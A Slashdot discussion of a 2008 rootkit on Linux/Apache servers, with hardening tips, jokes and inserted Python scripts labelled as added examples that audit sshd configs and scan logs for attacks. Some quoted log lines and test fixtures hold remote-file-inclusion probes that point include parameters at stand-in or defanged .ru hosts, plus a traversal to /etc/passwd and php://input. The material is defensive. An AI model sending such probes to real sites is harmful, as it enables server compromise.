Mystery Malware Affecting Linux/Apache Web Servers
lisah writes "Reports are beginning to surface that some Web servers running Linux and Apache are unwittingly infecting thousands of computers, exploiting vulnerabilities in QuickTime, Yahoo! Messenger, and Windows. One way to tell if your machine is infected is if you're unable to create a directory name beginning with a numeral. Since details are still sketchy, the best advice right now is to take proactive steps to secure your servers. 'We asked the Apache Software Foundation if it had any advice on how to detect the rootkit or cleanse a server when it's found. According to Mark Cox of the Apache security team, "Whilst details are thin as to how the attackers gained root access to the compromised servers, we currently have no evidence that this is due to an unfixed vulnerability in the Apache HTTP Server." We sent a similar query to Red Hat, the largest vendor of Linux, but all its security team could tell us was that "At this point in time we have not had access to any affected machines and therefore cannot give guidance on which tools would reliably detect the rootkit."'"
I wonder what other OSs have the issue.
Also, if this is utilizing windows machines as well, how would a person with windows find out if their machine was compromised?
It's high time for better software, and the only way to get that is to apply market pressure. Software liability is the answer.
I think it's funny that Apache is affected by the same drama that affected IIS all those years ago.
We haven't really grown up, have we?
This is why serious businesses choose a serious web server: Microsoft Internet Information Services running on Microsoft Windows Server.
Last night I discovered a directory named 53 4B 59 4E 45 54 in my home folder.
I do believe that if this story was with IIS it would be tagged ahah :)
"According to a press release issued earlier this month ..."
Yawn.
Does this rootkit work on a hardened Gentoo install with no LKM support on SPARC64? :P
-:sigma.SB
WARN
THERE IS ANOTHER SYSTEM
I can see thousands of people trying to make numeric directories :)
Yes, also if you can run your tummy while patting your head you aren't infected also.
I think.... this crazy idea is the virus!
IIS are serious server. This are serious thread.
In Xanadu did Kubla Khan
A stately pleasure dome decree
Bozo the Clown serious?
Lack of planning on your part does not constitute an emergency on mine.
Underage anime? Does that refer to pictures drawn after 1990?
It's for Apache/Linux so it must be well crafted code written with the best intention....
Isn't that always the case with FOSS. If it was for Microsoft then it would be _real_ malware....
I did a mkdir 09F911029D74E35BD84156C5635688C0 and all I got was a DMCA rm -f 09FA* request.
To figure out what the compromise vector is, it's probably going to be necessary to figure out what the compromised servers have in common -- and how that differs from uncompromised servers. (Keeping in mind that currently-uncompromised servers may have the same vulnerability, and that attackers or their software just may not have gotten to them yet.)
I'd suggest enumerating factors such as OS, OS version, remote access methods (ssh, ftp, etc.), Apache versions, Apache modules, add-ons like CPanel, network/ASN, and so on -- anything could be a culprit at this point.
And that includes things that have nothing to do with Linux or Apache: for example, it's possible that the attackers acquired root passwords by infecting Windows systems used by administrators -- then just waited for them to initiate ssh sessions to their servers. It'd probably be best to leave all possibilities open and consider them equally likely until evidence starts accumulating in favor of/against them. (In re-reading that last statement, I suppose it sounds a bit trite. I'm just trying to discourage premature conclusions that anything is at fault until somebody can produce evidence to support saying so.)
The Register has been on this for a while and although the story is older it is better written and has more interesting details: http://www.channelregister.co.uk/2008/01/16/mysterious_web_infection_continues/
my $.02 of course
I see this type of attack all the time, the fact that someone automated it and gave it a zombie machine is not surprising.
* Don't allow root to ssh into your machine.
* Disable ssh1.
* Limit sudoers.
* Have good passwords.
* ???
* PROFIT!!
Seems like a formula everyone should know.
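As a worked version of the first two items on that list (plus the key-only login policy other posters in this thread recommend), here is a small Python audit of an sshd_config. This is an added example, not code from the thread or from OpenSSH; the two config files it checks are constructed for the example, and the "first keyword occurrence wins" rule it applies is sshd's own.

```python
"""Audit an sshd_config for the items in the checklist above.

Added example: this is not code from the thread.  Both configs below are
constructed for the example; the checks mirror the thread's advice (no root
logins over ssh, no SSHv1) plus the key-only policy advocated later in it.
"""
import re

WEAK_CONFIG = """\
# constructed: a permissive sshd_config of the kind the thread warns about
Port 22
Protocol 2,1
PermitRootLogin yes
PasswordAuthentication yes
MaxAuthTries 10
"""

HARDENED_CONFIG = """\
# constructed: the same file after applying the checklist
Port 22
Protocol 2
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
MaxAuthTries 3
AllowGroups sshusers
# sshd honours the FIRST occurrence of a keyword, so this later line is inert
PermitRootLogin yes
"""


def parse_sshd_config(text):
    """Return {keyword(lowercase): value} using sshd's own rules:
    '#' starts a comment, keywords are case-insensitive, 'Keyword value' or
    'Keyword=value', the first occurrence of a keyword wins, and parsing
    stops at the first Match block because its settings are conditional."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":
            break
        settings.setdefault(key, value)
    return settings


def audit_sshd_config(text):
    """Return a list of (keyword, problem) pairs; an empty list means the file passes."""
    s = parse_sshd_config(text)
    findings = []

    root = s.get("permitrootlogin", "").lower()
    if root == "yes":
        findings.append(("PermitRootLogin", "root may log in directly over ssh"))
    elif root == "":
        # older OpenSSH releases default this to 'yes'; say it explicitly
        findings.append(("PermitRootLogin", "not set; older sshd defaults to yes"))

    versions = {v.strip() for v in s.get("protocol", "2").split(",")}
    if "1" in versions:
        findings.append(("Protocol", "SSHv1 is enabled"))

    if s.get("passwordauthentication", "yes").lower() != "no":
        findings.append(("PasswordAuthentication", "passwords accepted; guessing is possible"))

    try:
        if int(s.get("maxauthtries", "6")) > 6:
            findings.append(("MaxAuthTries", "more guesses per connection than the default 6"))
    except ValueError:
        findings.append(("MaxAuthTries", "not an integer"))

    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_sshd_config(cfg) or "OK")
```

Run it against /etc/ssh/sshd_config by reading the file into `audit_sshd_config`; the trailing `PermitRootLogin yes` in the hardened sample is there to show why an audit has to honour sshd's first-match rule rather than grepping for the last value.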
I said no... but I missed and it came out yes.
Are your R's and B's "Crossover" keys, or Virtual Keys, or VirtualBox keys?
Run your tummy makes me think of being run over, or loosing a hot bowel of a lahar surmounting, umm, surpassing even Mt. Pinatubo.
Previously: "Linux... Toward the Sunrise..." Now: "Linux... Toward the-- No, now, part of Every Sunrise"
me@web:~$ cd ~www-data
me@web:/var/www$ mkdir 12directory
mkdir: cannot create directory `12directory': Permission denied
me@web:/var/www$
OHMIGOSH, I've been infected!
</dunce-mode>
Reports are beginning to surface that some Web servers running IIS are unwittingly infecting thousands of computers, exploiting vulnerabilities in QuickTime, Yahoo! Messenger, and Windows. One way to tell if your machine is infected is if a Windows logo appears on system startup. Since details are still sketchy, the best advice right now is to take proactive steps to secure your servers. 'We asked Sony if it had any advice on how to detect the rootkit or cleanse a server when it's found. According to Joe Blow of the Sony security team, "That rootkit is protected under the DMCA. Detection or cleansing the rootkit will be punished to the fullest extent permissible by law." We sent a similar query to Microsoft, the largest vendor of Windows, but all its security team could tell us was that "At this point in time we have not had access to any affected machines and therefore cannot give guidance on which tools would reliably detect the rootkit."
Seriously, everyone knows Linux is completely and utterly unhackable. This is obviously some kind of viral pro-MS FUD. =)
Is the way to go.
The GeekNights podcast is going strong. Listen!
I'll take my chances with *BSD.
It only takes one man to change the Wisdom of the Crowd to Tyranny of the Masses.
There are a thousand ways to root a machine, and there are a lot of ways to configure apache so that it's either very secure or very insecure - but really apache is just one attack vector. Given that all the machines exhibited distribution of the Windows malware, it may be a common configuration problem between those servers - but how many servers do they know about that were distributing the software? 10? 1000? 10,000? You would think if there were that many of them there would be incremental backups that you could look through to see what was going on in the system.
Logically assuming that it is just a handful of servers based on the fact that nobody has pinpointed the problem, more likely it's that the server admins are either the problem, or it is an attack on a very specific configuration and software combination.
Whoa there buddy. Are you saying anything before 1990 is not underage?
GOD DAMNIT! How am I becoming old?
"I use a Mac because I'm just better than you are."
... though a solution has not been yet:
http://blog.trendmicro.com/e-commerce-sites-invaded/
If you happen to have one of these compromised systems, I am sure that Trend would like to talk to you about it...
There is something suspicious about this report. Some things can't happen the way people say they happen, and when that is the case we have to look at more likely scenarios.
I would bet the path of the TCP/IP packets routes through compromised providers who have an injection strategy. Remember a few months ago how ISPs were injecting their own JavaScript and ads into the pages of other sites?
http://ars.userfriendly.org/cartoons/?id=20070703
This is the most likely scenario I can think of.
* Don't allow root to ssh into your machine.
:)
This shouldn't be a big deal unless root also has an easily guessed password.
* Have good passwords.
Absolutely. Try "squam1sh666oss1frage" instead of "susan". Check your other users too, particularly people in group wheel. I had an account used as an attack because it was set up with an easily guessed name and password and I was never actually given the password - I always sshed in with a DSA key.
I would add:
* Have a strong password validator, but don't force people to cycle passwords... that encourages easily guessed passwords because easily remembered ones are easily guessed. The best password validator is to run the best password cracking tools you can lay your hands on against your own password file.
FTFA - "The random js toolkit was detected using Finjan's patented real-time code inspection technology while diagnosing users' web traffic during December 2007..."
This is all just a ploy to bring attention to Finjan for financial gain!
All your BASE are belong to us.
Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
You should worry more if you find one that's 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 because that means that you're under siege by pirates, and it's really hard to find good ninjas these days.
Used to be that smarmy hipsters spoke in leetspeak with tongue firmly in cheek. By the next generation the ironic context was gone completely. We were left with hordes of dumbfucks using leetspeak and legitimately attempting to be cool. b1ff became REAL.
Now we have the same sort of annoying trend-slave fucks perpetuating the lolcat baby talk meme. I sure can't wait to see how utterly fucked-up and retarded the teenagers of the upcoming generation are going to sound thanks to you worshippers of the unintended consequence.
Just remember, wherever you go, there you are.
Armaments, 2-9-21 And Saint Attila raised the hand grenade up on high, saying, 'O Lord, bless this Thy hand grenade' N
This is obviously not true. After all, Linux zealots constantly say that Linux isn't vulnerable to malware...
The articles on this keep mentioning cPanel. Now, I've never used or looked at that specific web CP, but it seems likely to me all the attackers would have to do is find a vulnerability on of the scripts used for updating the configs, or adding a DB entry to update the configs, etc. Yes, I know this supposition is light on detail, but given what most control panels eventually have to have access to, seems the more likely than some mystery apache exploit... just tell the scripts they need to update the configs.. or use them to push an update to the machine, etc.
Goodbye Windows, Hello Linux...
RE: Goodbye Linux, Hello Linux...
FW: RE: Goodbye Windows, Hello Linux - Goodbye Linux, Hello OpenBSD.
Which is hardly an advantage on Linux because everybody can su to root.
OK, check ALL your other users.
Limiting it to group wheel is not a particularly big hurdle. There are enough applications setuid to root to find execution exploits in that one more is not much of a barrier.
The common UNIX implementation whereby group 0 or UID 0 membership acts as the gateway to such unobvious capabilities as opening low ports really needs to be readdressed. Traditionally, you would have group access to devices (eg, /dev/tcp/25) acting as the required capability, rather than having to become superuser for such a common operation.
I have seen quite a bit of botnet activity on apache web servers lately. It is mostly due to bad coding where php developers run the include or require functions on unchecked GET variables. All the attacker has to do is point that variable to a bad url and load the page in a browser. He then uses this to load a small php or perl bot that connects to various irc servers specified in the code. Once that is done all he has to do is issue commands in the irc channels to ddos, spam, scan... and so on. This is all run under the owner of the apache service.
#include <stdio.h>
#include <stdlib.h>

#define FALSE 0

extern int mkdir_main(int argc, char **argv)
{
    int i = FALSE;

    argc--;
    argv++;

    /* Parse any options (the option handling itself is cut off in the original post) */
    while (argc > 0 && **argv == '-') {
        while (i == FALSE && *++(*argv)) {
            switch (**argv) {
            default:
                break;
            }
        }
        argc--;
        argv++;
    }

    /* The "rootkit": refuse any directory name that begins with a digit ('0'..'9') */
    if (argc > 0 && (**argv >= '0') && (**argv <= '9')) {
        printf("PWN3D N00B!!!111\n\n--Ron Paul 08\n");
        return 1;
    }

    return 0;
}
"Beware of bugs in the above code; I have only proved it correct, not tried it." -- Donald Knuth
Seems as good of a place as any to mention it, but maybe it has something to do with the multitudes of requests for URLs like: /exclusives.php?id=hxxp://amymusicgirl.h17.ru/mysong.txt?
/exclusives.php?id=hxxp://amyru.h18.ru/images/cs.txt?
/exclusives.php?id=hxxp://joioiskioeriyyskwkdwjsdfewis.land.ru/.html/body?
( tt changed to xx in protocol )
that I've been seeing in my logs for the last 8 months or more.. Or are these just a poor attempt to spam webmasters?
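Those log entries are the textbook shape of the remote file inclusion probes the earlier comment describes (an include()/require() fed from an unchecked GET variable). As an added example, not code from the thread or from any of the posters, here is a Python pass over Apache combined-format access log lines that picks out parameter values which would make such an include fetch code from outside the document root. The log lines are constructed for the example (documentation address ranges, a hypothetical attacker.example host), but follow the /exclusives.php?id=http://... pattern quoted above. The fix on the PHP side is to map the parameter onto an allowlist of local files and to set allow_url_include=Off; this script only finds the attempts.

```python
"""Flag include()/require() probes in Apache access logs.

Added example, not code from the thread.  The log lines are constructed
(hosts from the documentation ranges; the attacker host is hypothetical) but
follow the /exclusives.php?id=http://... shape quoted above.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlparse

SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [16/Jan/2008:10:21:03 +0000] "GET /exclusives.php?id=http://attacker.example/mysong.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.7 - - [16/Jan/2008:10:21:04 +0000] "GET /exclusives.php?id=http%3A%2F%2Fattacker.example%2Fimages%2Fcs.txt%3F HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
198.51.100.9 - - [16/Jan/2008:10:25:11 +0000] "GET /exclusives.php?id=42 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [16/Jan/2008:10:25:12 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 404 300 "-" "Mozilla/5.0"
203.0.113.7 - - [16/Jan/2008:10:26:00 +0000] "GET /index.php?page=php://input HTTP/1.1" 200 100 "-" "libwww-perl/5.805"
"""

# Combined log format: ip ident user [time] "method target proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# A value that reaches include() with one of these prefixes pulls code from outside
# the document root: a remote URL, or PHP's own php:// and data:// stream wrappers.
REMOTE_RE = re.compile(r"^\s*(?:https?|ftp|php|data)://", re.IGNORECASE)
# The same unchecked include also allows local traversal, so report that too.
TRAVERSAL_RE = re.compile(r"(?:^|/)\.\.(?:/|$)")


def classify(value):
    """'remote', 'traversal', or None for a harmless parameter value."""
    if REMOTE_RE.search(value):
        return "remote"
    if TRAVERSAL_RE.search(value):
        return "traversal"
    return None


def inclusion_probes(log_lines):
    """Return one dict per suspicious query parameter, in log order.
    parse_qsl percent-decodes values, so the encoded second line is caught too."""
    probes = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlparse(m["target"])
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            kind = classify(value)
            if kind:
                probes.append({"ip": m["ip"], "path": url.path, "param": name,
                               "value": value, "kind": kind, "status": int(m["status"])})
    return probes


def probes_per_ip(probes):
    """How many probes each client sent; a high count from one host with a scripted
    user agent is the scanner, a 200 on a 'remote' probe is the one to worry about."""
    return Counter(p["ip"] for p in probes)


if __name__ == "__main__":
    found = inclusion_probes(SAMPLE_ACCESS_LOG.splitlines())
    for p in found:
        print(p["ip"], p["kind"], p["path"], p["param"], "=", p["value"], "->", p["status"])
    print(probes_per_ip(found))
```

A 404 on a probe means the script being fished for is not there; a 200 against a PHP script that really does include() its parameter is the case to investigate, starting with what the web server's user has written under the web root since that request.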
HMMM
Fail2ban is another nice way to deal with these brute force attacks.
Preventive War is like committing suicide for fear of death. - Otto Von Bismarck
...out there used to say the same exact thing, the OMG warning that if you made them make quality products and be subject to recalls/rebates/removal from the market, provide a warranty in other words, that everything would cost so much that it would collapse civilization. Cars to foods to snakeoil medicine, they all said the same thing back before there were *any* warranties or any safety standards or like that. Look around, software is the only one left that doesn't need a warranty, civilization never collapsed when all the other industries were forced into complying with bare minimum standards and "suitability for purpose" and everything is still affordable. What they did was take good engineering to heart, because to not do that costs them more money.
That old song and dance is old, it is a pitiful juvenile whiny crybaby excuse from shoddy practicers, baby talk nonsense.
The software industry will never collapse, it is too valuable. All that will happen is not as fast releases of much better quality code, much less emphasis on 3-d effects and zebra striped "skins", and think on this all you devs-you now would have the perfect weapon against the PHB and sales weasels to let you actually do good code, instead of forced shipping of what you *know* is almost complete crap.
You can't even begin to call yourself an adult in a professional position unless you are willing to stand up for the quality of your work, including "suitability of purpose", such as being exposed to the internet. Take the training wheels off, or go get a job you can be competent in, that should apply to ALL industries, with no exceptions.
I have a pretty long password, and I'm pretty bad at remembering things.
Besides hopefully you don't have 12345 as root password, because anything but that will be pretty hard to brute force. I'm fine with people trying to log on as root on my machine. They are going to need a lot of time to find my password that way.
Why do people allow the public Internet to brute-force accounts on their systems? There are plenty of ways to cut off IPs who have too many failed login attempts. Or, you could do what I do:
[casper]$ ssh myserver.com
Permission denied (publickey).
In other words, if you want to log into my server, you need a certificate. Password-based logins are disallowed by system policy.
They don't grade fathers, but if your daughter's a stripper, you fucked up. --Chris Rock
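For the "cut off IPs who have too many failed login attempts" approach (what Fail2ban, mentioned earlier in the thread, does for the sshd jail), here is an added Python example, not code from the thread or from fail2ban, that applies the same threshold-within-a-window rule to sshd's auth log lines. The lines are constructed for the example; maxretry and findtime are fail2ban's names for the two knobs, and the values used are assumptions. It also reports a successful login from a host that had already crossed the threshold, which is the "a guess worked" case rather than mere noise.

```python
"""Flag ssh password guessing in sshd's auth log, the way fail2ban's sshd jail does.

Added example, not code from the thread.  The log lines are constructed (hosts
from the documentation ranges); maxretry/findtime are fail2ban's names for the
threshold and window, and the numbers are assumptions.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

SAMPLE_AUTH_LOG = """\
Jan 16 03:12:01 web sshd[4411]: Failed password for invalid user admin from 203.0.113.7 port 4412 ssh2
Jan 16 03:12:02 web sshd[4413]: Failed password for invalid user oracle from 203.0.113.7 port 4413 ssh2
Jan 16 03:12:04 web sshd[4415]: Failed password for root from 203.0.113.7 port 4415 ssh2
Jan 16 03:12:05 web sshd[4417]: Failed password for root from 203.0.113.7 port 4417 ssh2
Jan 16 03:12:07 web sshd[4419]: Failed password for root from 203.0.113.7 port 4419 ssh2
Jan 16 03:12:09 web sshd[4421]: Accepted password for root from 203.0.113.7 port 4421 ssh2
Jan 16 07:40:00 web sshd[5001]: Failed password for alice from 198.51.100.9 port 51000 ssh2
Jan 16 07:40:08 web sshd[5003]: Accepted publickey for alice from 198.51.100.9 port 51002 ssh2
Jan 16 09:00:00 web sshd[6001]: Failed password for bob from 192.0.2.5 port 60001 ssh2
Jan 16 09:30:00 web sshd[6003]: Failed password for bob from 192.0.2.5 port 60003 ssh2
Jan 16 10:00:00 web sshd[6005]: Failed password for bob from 192.0.2.5 port 60005 ssh2
Jan 16 10:30:00 web sshd[6007]: Failed password for bob from 192.0.2.5 port 60007 ssh2
Jan 16 11:00:00 web sshd[6009]: Failed password for bob from 192.0.2.5 port 60009 ssh2
"""

AUTH_RE = re.compile(
    r"^(?P<ts>\w{3} \d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<event>Failed password|Accepted password|Accepted publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_ts(text):
    # syslog timestamps carry no year; only differences are needed, so 1900 is fine
    return datetime.strptime(text, "%b %d %H:%M:%S")


def brute_force_report(lines, maxretry=5, findtime=600):
    """Return {'flagged': {ip: time it reached maxretry failures within findtime seconds},
    'logins_after_flag': [(ip, user, event), ...]} where the second list holds successful
    logins from a host that had already been flagged, i.e. a guess that worked."""
    recent = defaultdict(deque)   # ip -> timestamps of failures inside the window
    flagged = {}
    logins_after_flag = []
    for line in lines:
        m = AUTH_RE.match(line)
        if not m:
            continue
        ts, ip = parse_ts(m["ts"]), m["ip"]
        if m["event"] == "Failed password":
            q = recent[ip]
            q.append(ts)
            # drop failures older than the window (q is never empty here)
            while (ts - q[0]).total_seconds() > findtime:
                q.popleft()
            if len(q) >= maxretry and ip not in flagged:
                flagged[ip] = ts
        elif ip in flagged:
            logins_after_flag.append((ip, m["user"], m["event"]))
    return {"flagged": flagged, "logins_after_flag": logins_after_flag}


if __name__ == "__main__":
    report = brute_force_report(SAMPLE_AUTH_LOG.splitlines())
    for ip, when in report["flagged"].items():
        print("ban", ip, "at", when.strftime("%b %d %H:%M:%S"))
    for ip, user, event in report["logins_after_flag"]:
        print("INVESTIGATE:", event, "for", user, "from already-flagged", ip)
```

Note the third host: five failures spaced half an hour apart never hold five entries inside a 600-second window, so with fail2ban-style defaults the slow guesser is never banned; widening findtime (or simply disabling password authentication, as the comment above does) is what closes that gap.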
You cannot login as root to a BSD machine, even if you enter the password correctly on the first attempt. That's the point. And if you are a legitimate user here, you would know this and would not even try.
Which means, all those, who try, are not legitimate and should be blocked on-sight...
In Soviet Washington the swamp drains you.
..that would ensue if this was IIS?
:) - just like the mac ads ;)
yep.. hypocrites
It are serious business.
I identified this rootkit on a system about 5 months ago and documented some of its behaviours (I think the only behaviour I've missed was the numerical directory thingy). Related blog post 25.08.2007 - http://ferruh.mavituna.com/makale/exploit-paketleri/ ).
There is one more thing to add: it modifies all valid HTTP responses, adding a .js after the body tag in all interfaces. There was one article that mentioned most of the compromised servers were based in the UK; it was the same for me. And considering it's been about 5 months, I assume UK websites were the prime target at the start.
I use sshblack on my FreeBSD machine.
Vivin Suresh Paliath
http://vivin.net
I like
with malware because Linux is a hostile environment.
Unix systems can be infected, like the original Arpanet worm that Robert Morris Jr. was accused of writing that infected Sendmail Unix servers.
I had run a Linux server in the past for my web server and I noticed things like that which forced me to reformat the system because Linux was acting funny with directory names and log files kept being deleted for no reason, to hide the malware infections and/or hacking attempts.
Remember, Slashdot does not have a -1 disagree moderation, and no, troll, flamebait, and overrated are not substitutes.
Unix systems can be infected, like the original Arpanet worm that Robert Morris Jr. was accused of writing that infected Sendmail Unix servers.
I had run a Linux server in the past for my web server and I noticed things like that which forced me to reformat the system because Linux was acting funny with directory names and log files kept being deleted for no reason, to hide the malware infections and/or hacking attempts. sorry but this really doesn't sound like you knew what you were doing.
"Last week, ScanSafe's Landesman drew a link between the security breach at UK-based Fasthosts and the site hacks, saying then that the domains ScanSafe had found infected had, or had recently had, a relationship with Fasthosts."
http://www.techworld.com/security/news/index.cfm?newsid=11184
It's not a software flaw according to Landesman. It's stupid admins not changing passwords or with a lingering delayed infection from the initial theft.
Huh? This reminds me of the incident where our mother in law asked a group of us if we were high because she seriously thought we were "laughing too much."
Wus. I want more baby, Ooh yeah! You know I love it!
Semi-automatic amateur armchair Australian philosopher; conjecture ready at any moment...
It won't happen as long as Microsoft defends its software via EULA. If they don't want to be held liable, why would another software maker want to accept liability?
The user can figure out which software is of better quality and use that one.
That's not new - Fedora Core 1 servers running cPanel handed out to "admins" who load it up with phpBB and never update it host a fair bit of crap. We've migrated customers off of those boxes, and it's always fun to check every single file you bring over to make sure there's no surprises.
On the last server compromise I had to clean up (php site, not updated - standard story), I spent some time going through the logs to check what other sites they'd used this thing as to springboard into other machines. It was a fair collection of blog servers, bulletin boards, and a few company sites. When I could locate a phone number, I would give them a call. Not a single one of the admins knew their boxes were hosting malware. A couple boxes had been replaced after whoever got in wrecked the site, but the vast majority were running just fine, just with a '.../' directory hanging off the web root.
Why can't I mod "-1 Idiot"?
I use OpenBSD for Internet-facing applications where I want security, e.g. the DMZ box on my home network that I want to be able to SSH into from the outside world. I really like OpenBSD conceptually, and happily send them my $60 or whatever it costs for a DVD with each major release, although I wish the pool of officially vetted software was bigger. (*cough* POSTFIX *cough*)
Because I use it for gateway/edge machines, I don't build the ports tree or use any software that's not part of the official system. This is pretty limiting and definitely not something you'd want to do if you were using it as a workstation. (OpenBSD has two kinds of software: officially-supported stuff, where somebody has combed through the code and generally locked it all down, and unsupported/unofficial 'ports,' which are installed slightly differently and haven't necessarily received the same level of attention.) There's definitely enough officially-supported OpenBSD software to run a basic server (mail/web/DNS) without going to ports, but you may not have the level of choice you're used to in, say, Debian Stable.
In fact although there are lots of people out there who run OpenBSD as a workstation OS, I'm not really sure why you'd want to (instead of one of the BSDs that's geared more towards that as a primary function). I could see the security benefits potentially coming into play if it was a laptop, and the code is very clean with an emphasis on technical 'correctness' (so it might be a good OS to run if you want to really understand what's going on inside your computer), but there are other options which are equally or more attractive for a pure desktop system. That's just my gut feeling; I'm sure there are other people who'd say differently and I certainly wouldn't argue with them.
Personally, I run either Mac OS X or Debian on my workstation/firewalled PCs. The Macs are mostly just out of inertia and the Debian machines are because I like apt-get. While there's no doubt in my mind that OpenBSD is the more technically correct, better designed, better documented, and less defect-prone system, it's not quite enough for me to switch over my day-to-day PCs. I am, I suppose, proof of my own assertion in my earlier comment.
The BSDs are pretty fascinating, and I think if I were starting with a clean slate today, without all the legacy applications and data and personal biases that I have, I'd probably look very seriously at one of the desktop BSD distros. Particularly if you're a student, there's something to be said for using a system that at least plays lip service to doing things 'right.'
One note regarding OpenBSD: if you do decide to play with it, you may want to avoid 4.2 and opt for 4.1 instead; 4.2 requires that you install X11 in order to run many packages that should not require X11 (server software), because of some dependency issues. This is supposed to be corrected in 4.3. Of course, if you're creating a workstation OS and plan to install X11 anyway, this is a moot point, but it's something to note if you're going to play with it on a server or headless box using the CLI first (which isn't a bad thing to do).
"Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
If Linux is secure, it shouldn't matter if the admins know what they're doing.
dom
Roasting in an epic bread.
Someone mod the entire thing +4ch up, please...
USE HOT GRITS WITH STATUE OF NATALIE PORTMAN (NAKED AND PETRIFIED)
The Microsoft Ad Campaign denouncing the evils of open source or the Linux Patch fixing the problem?
Genesis 1:32 And God typed
In the article they are speculating that the vector may have been a root password compromise. There are several ways of getting at this, it could be a weak password, it could be a brute force attack against an obtained password file, it could be social engineering.
You'd be surprised how many weak root passwords there are out there, my home machine was recently the victim of a dictionary attack (my own stupid fault - weak password on a seldom used account got compromised). They did not get root, I've run forensics on the compromised disk however it was still used to scan other machines for ssh access. I found and stopped it within 12 hours, but in that time it had found over 30 machines it could SSH into including one with the root password 'root'.
There is no technical solution to poor administration, a well maintained Windows system will be more secure than a poorly maintained Linux system.
I read elsewhere that the passwords to the Apache servers were stolen: hardly a vulnerability, just carelessness by somebody. The vulnerable machines are the Windows boxes that are getting attacked successfully. Same old story, really.
n/t
my root password is secure, it's 24 characters long, has no repeating sequences, and uses upper and lower case, numbers and non-alphanumeric values.
it's "AS23459%^&glmG=$%de+" which as far as john the ripper is concerned is unbreakable.
Not that easy to remember, but I have been using it for 7 years and it's on all my production boxes and my laptop.
Does anyone have proof that root was achieved through an Apache exploit?
I don't think mapping group ID directly to port is a good idea. For one thing, it's not generally extensible to other numeric domains. You should map permissions on an object visible in the file system to access to the port. Ideally, this would be handled by replacing crazy overlaid in_addr objects with filenames.
That is, instead of calling socket and bind and so on, you'd call 'sock = open("/net/tcp/listen/25", O_RDWR)'. Normal file system protection on /net/tcp/listen/* would provide access control. Similarly, to make an outgoing connection, you'd call 'sock = open("/net/tcp/connect/10.0.0.2/25", O_RDWR);'. You wouldn't need to modify your code to connect to IPV6 or even OSI TP4/CONS or DEC LAT ports... or UNIX domain sockets... or named pipes...
The whole Berkeley Socket design is second only to System V IPC in terms of missing the whole point of UNIX.
System security aside, the idea that 90% of users don't give a shit, and that's okay, is the whole problem here.
But users who do care don't use MSWindows.
And you, who expect another 15 years of "satisfaction" don't seem to understand why.
situation normal, all fouled up, business as usual, let's make some more money.
Computer memory is just fancy paper, CPUs just fancy pens with fancy erasers; the 'net is just a fancy backyard fence.
I'm with you on software liability, iff Micro$oft leads the list of liable entities.
Because, in fact, they do. They pushed the internet to the public before it was ready. Everybody else who did that understood the dangers pretty soon and backed off. Bill and Steve picked up the ball and ran. Didn't seem to realize they were running towards the wrong goalposts, maybe, or maybe they just knew the fan club of the opposing team was willing to reward them richly.
I can't seem to find any mentions of someone figuring out exactly what this exploit/problem/etc. is. Seems really weird. I mean, *someone* has to have an infected machine that can be looked at. And what about SysAdmins doing something to at least perform post-compromise analysis? Even my *personal* webserver logs over syslog-ng to an append-only filesystem, and Bacula runs nightly MD5sums of pretty much the whole FS (not to mention remotely downloading the bacula binary every night and MD5summing that). At the very least, someone should be able to verify the technical details.
Something here reeks of FUD....
"GUIs provide metaphors for users, they have no place in administration." - GREAT quote.
And as to IIS/Apache/whatever else... telling people to use IIS when a problem is found that may involve Apache is as stupid as telling IIS people to use Apache when (another) IIS bug is found. Software is buggy. When the likes of Amazon, Google, etc. use Apache (or base their servers on it), I think it can be considered stable enough for production use. All software has flaws. That's a fact of life. Telling people to use a different package because of one bug is as narrow-minded as telling people to sell their Hondas/Fords/Chevys/Toyotas because you saw one in the shop.